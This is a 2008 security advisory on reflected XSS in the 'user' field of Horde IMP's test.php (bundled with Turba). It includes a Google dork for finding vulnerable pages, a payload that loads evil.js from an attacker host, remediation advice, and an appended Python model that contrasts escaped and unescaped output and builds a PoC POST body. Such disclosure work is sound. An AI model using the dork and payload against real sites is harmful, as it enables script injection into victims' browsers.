Horde and Turba Contact Manager version H3 2.2.1 suffer from a cross site scripting vulnerability that allows remote JavaScript file inclusion.
+======================================================================================================+
+ Horde & Turba Contact Manager: XSS Vulnerability and Remote JavaScript File Inclusion +
+======================================================================================================+
Author(s): Ivan Sanchez
Product: Turba Contact Manager
Web: http://www.horde.org/turba/
Turba is the Horde contact management application. It is a production level
address book, and makes heavy use of the Horde framework to provide integration
with IMP and other Horde applications.
Date: 14/09/2008
----
Version Affected:
-----------------
Download:
http://ftp.horde.org/pub/turba/turba-h3-2.2.1.tar.gz
Others:
* Turba H3 (2.2.1) (final)
* turba-h3.1.1
* IMP: H3 (4.2)
* IMP: H3 (4.1)
* IMP: 4.1-cvs
* IMP: H3 (4.1.6)
* IMP: H3 (4.1.3)
* IMP: 3.2.2
Google Dork:
------------
inurl:"/imp/test.php?"
Vulnerable Script:
------------------
http://site/horde/imp/test.php (IMP's server connection test page)
Internal Variables:
-------------------
1- Download Turba H3 (2.2.1) (final) and audit the code; the affected file ships with IMP under horde/imp/.
2- View the affected file and lines:
File: imp/test.php
Lines: 92/94
$user = isset($_POST['user']) ? $_POST['user'] : ''; // 'user';
The POST value is stored without any sanitization and is then reflected back into the connection test form, so whoever controls the 'user' field controls the page markup.
First Exploit:
-------------
Insert the XSS payload (a remote JavaScript include) into the "User" text box of the connection test form:
Server ok
Protocol ok (e.g. "imap" or "imap/notls")
Port ok (defaults to "143")
User <---------------------------------- 'user'= "><script src=http://site/scripts/evil.js></script>
Password ok
The leading "> closes the value attribute of the input field, and the injected <script> tag loads evil.js from the attacker's host in the browser of whoever views the page.
Remediation:
------------
Sanitize all parameters: HTML-escape every user-supplied value (double quotes included) before echoing it into the page, and never reflect POST data into an attribute unescaped.
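The attribute breakout described in the exploit section and the escaping asked for in the remediation, as an added example that is not part of this advisory or of Horde's code: a Python model of the "User" row of test.php, rendered once the way the unsanitized assignment above behaves and once with the value escaped, plus the form-encoded body a PoC POST would carry. The row markup, the field names other than 'user' (server, protocol, port, passwd), and the host are assumptions; html.escape(quote=True) stands in for PHP's htmlspecialchars($user, ENT_QUOTES).

```python
"""Reflected XSS in the 'user' field of imp/test.php, modelled in Python.

Added example, not code from the advisory or from Horde. The form markup,
the field names other than 'user', and the target host are assumptions.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# The advisory's payload: the leading "> closes value="..." and a <script>
# tag pointing at an attacker-controlled host follows.
PAYLOAD = '"><script src=http://site/scripts/evil.js></script>'


def render_user_row(user, escape=False):
    """Model of the form row that reflects $_POST['user'] back to the browser.

    escape=False mirrors the vulnerable assignment ($user used verbatim).
    escape=True applies the equivalent of htmlspecialchars($user, ENT_QUOTES):
    html.escape with quote=True also encodes the double quote, which is what
    stops the attribute breakout. (Markup is an assumption, not IMP's own.)
    """
    if escape:
        user = html.escape(user, quote=True)
    return (f'<tr><td>User</td>'
            f'<td><input type="text" name="user" value="{user}" /></td></tr>')


class ScriptFinder(HTMLParser):
    """Collects the src attribute of every <script> element in a page."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_srcs.append(dict(attrs).get("src"))


def injected_scripts(page_html):
    """Return the src of each <script> a browser would execute from the page."""
    finder = ScriptFinder()
    finder.feed(page_html)
    finder.close()
    return finder.script_srcs


def poc_post_body(user_payload=PAYLOAD):
    """Form-encoded body for POST /horde/imp/test.php.

    Only 'user' comes from the advisory; the other names and values are
    placeholders for the rest of the connection test form.
    """
    return urlencode({
        "server": "localhost",
        "protocol": "imap/notls",
        "port": "143",
        "user": user_payload,
        "passwd": "x",
    })


if __name__ == "__main__":
    vulnerable = render_user_row(PAYLOAD)
    fixed = render_user_row(PAYLOAD, escape=True)
    print("vulnerable row:", vulnerable)
    print("  scripts loaded:", injected_scripts(vulnerable))
    print("escaped row:   ", fixed)
    print("  scripts loaded:", injected_scripts(fixed))
    print("PoC body:", poc_post_body())
```

Run it as a script: the unescaped row yields one script element whose src is the attacker's evil.js, the escaped row yields none because the quote and angle brackets arrive as entities inside the attribute, and the printed body is what a client would send to the test page if it had a target to send it to.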
Thx.
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!